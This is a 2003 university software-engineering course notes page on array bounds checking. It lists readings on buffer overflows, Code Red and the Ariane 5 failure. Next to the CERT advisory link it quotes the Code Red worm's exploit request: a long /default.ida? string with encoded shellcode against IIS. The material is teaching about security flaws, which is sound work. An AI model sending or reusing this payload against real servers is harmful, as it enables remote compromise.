Department of Computer Science
CS 201J: Engineering Software
National Science Foundation
|
CS201J: Engineering Software, Fall 2003
|
Notes: Tuesday 30 September 2003
Assignments Due
- Thursday, 2 October: Problem Set 4, design document (2 copies)
Notes and Questions
What are the advantages and disadvantages of each approach to array bounds errors:
- No checking (C)
- Run-time checking (Java)
- Static checking (ESC/Java)
Links
Buffer Overflows
- CAIDA Analysis of Code Red
- CERT Advisory. The request that exploits the buffer overflow vulnerability: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a- Smashing the Stack for Fun and Profit, Aleph One
- Improving Security Using Extensible Lightweight Static Analysis (David Evans and David Larochelle), IEEE Software, Jan/Feb 2002.
Run-Time Exceptions
- Reports on the Ariane 5 run-time exception: Lions Report (official inquiry), Jean-Marc Jiziquel and Bertrand Meyer Stephen Marshall (include video of explosion)
Our recommendation now is the same as our recommendation a month ago, if you haven't patched your software, do so now.
Scott Culp, security program manager for Microsoft's security response center
|
|
University of Virginia Department of Computer Science CS 201J: Engineering Software |
|
Sponsored by the National Science Foundation |
cs201j-staff@cs.virginia.edu |